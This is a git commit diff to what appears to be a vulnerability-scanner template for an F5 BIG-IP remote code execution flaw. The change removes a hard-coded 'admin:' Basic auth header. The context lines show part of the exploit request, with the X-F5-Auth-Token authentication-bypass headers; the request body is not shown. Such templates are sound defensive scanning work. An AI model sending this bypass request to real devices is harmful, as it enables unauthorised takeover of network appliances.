misc: Remove unnecessary request header

patch-1
Dwi Siswanto 2022-05-09 15:15:36 +07:00
parent f572c898c5
commit 955e67ca1f
1 changed files with 0 additions and 4 deletions

View File

@ -14,9 +14,6 @@ info:
- https://support.f5.com/csp/article/K23605346
tags: bigip,cve,cve2022,rce,mirai
variables:
auth: "admin:"
requests:
- raw:
- |
@ -24,7 +21,6 @@ requests:
Host: {{Hostname}}
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: a
Authorization: Basic {{base64(auth)}}
Content-Type: application/json
{